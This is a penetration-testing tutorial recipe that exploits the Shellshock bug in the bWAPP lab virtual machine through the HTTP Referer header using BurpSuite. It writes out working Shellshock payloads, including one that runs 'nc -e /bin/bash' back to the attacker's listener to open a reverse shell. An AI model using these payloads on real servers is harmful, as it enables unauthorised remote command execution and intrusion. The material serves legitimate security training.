Shellshock (also called Bashdoor) is a bug that was discovered in the Bash shell in September 2014, allowing the execution of commands through functions stored in the values of environment variables.
Shellshock is relevant to us as web penetration testers because developers sometimes use calls to system commands in PHP and CGI scripts—more commonly in CGI—and these scripts may make use of system environment variables.
In this recipe, we will exploit a Shellshock vulnerability in the Bee-box-vulnerable virtual machine to gain command of execution on the server.
- Log into
http://192.168.56.103/bWAPP/. - In the Choose your bug: drop-down box, select Shellshock Vulnerability (CGI) and then click on Hack:
In the text, we can see something interesting: Current user: www-data. This may mean that the page is using system calls to get the username. It also gives us a hint: Attack the referrer.
- Let's see what is happening behind the curtains and use BurpSuite to record the requests and repeat step 2.
- Let's look at the proxy's history:
We can see that there is an
iframecalling a shell script:./cgi-bin/shellshock.sh, which might be the script vulnerable to Shellshock. - Let's follow the hint and try to attack the referrer of
shellshock.shso we first need to configure BurpSuite to intercept server responses. Go to Options in the Proxy tab and check the box with the text Intercept responses based on the following rules: - Now, set BurpSuite to intercept and reload
shellshock.php. - In BurpSuite, click Forward until you get to the GET request to
/bWAPP/cgi-bin/shellshock.sh. Then, replace theRefererwith:() { :;}; echo "Vulnerable:"
- Click Forward again, and once more in the request to the
.ttffile and then we should get the response fromshellshock.sh, as shown:
The response now has a new header parameter called
Vulnerable. This is because it integrated the output of theechocommand to the HTML header so we can take this further. - Now, repeat the process and try the following command:
() { :;}; echo "Vulnerable:" $(/bin/sh -c "/sbin/ifconfig")
- Being able to execute commands remotely on a server is a huge advantage in a penetration test and the next natural step is to obtain a remote shell. Open a terminal in Kali Linux and set up a listening network port, as shown here:
nc -vlp 12345
- Now go to BurpeSuite proxy's history, select any request to
shellshock.sh, right-click on it and send it to Repeater, as illustrated:
- Once in Repeater, change the value of Referer to:
() { :;}; echo "Vulnerable:" $(/bin/sh -c "nc -e /bin/bash 192.168.56.1 12345")In this case, 192.168.56.1 is the address of our Kali machine.
- Click Go.
- If we check our terminal and we can see the connection established, issue a few commands to check whether or not we have a remote shell:
In the first five steps, we discovered that there was a call to a shell script and, as it should have been run by a shell interpreter, it may have been bash or a vulnerable version of bash. To verify that, we performed the following test:
() { :;}; echo "Vulnerable:"The first part () { :;}; is an empty function definition since bash can store functions as environment variables and this is the core of the vulnerability, as the parser keeps interpreting (and executing) the commands after the function ends which allows us to issue the second part echo "Vulnerable:" which is a command that simply returns echoes, what it is given as input.
The vulnerability occurs in the web server because the CGI implementation maps all the parts of a request to environment variables so this attack also works if done over User-Agent or Accept-Language instead of Referer.
Once we knew the server was vulnerable, we issued a test command ifconfig and set up a reverse shell.
A reverse shell is a remote shell that has the particular characteristic of being initiated by the victim computer so that the attacker listens for a connection instead of the server waiting for a client to connect as in a bind connection.
Once we have a shell to the server, we need to escalate privileges and get the information needed to help with our penetration test.
Shellshock affected a huge number of servers and devices all around the world and there is a variety of ways to exploit it, for example, the Metasploit Framework includes a module to set up a DHCP server to inject commands on the clients that connect to it; this is very useful in a network penetration test in which we have mobile devices connected to the LAN (https://www.rapid7.com/db/modules/auxiliary/server/dhclient_bash_env).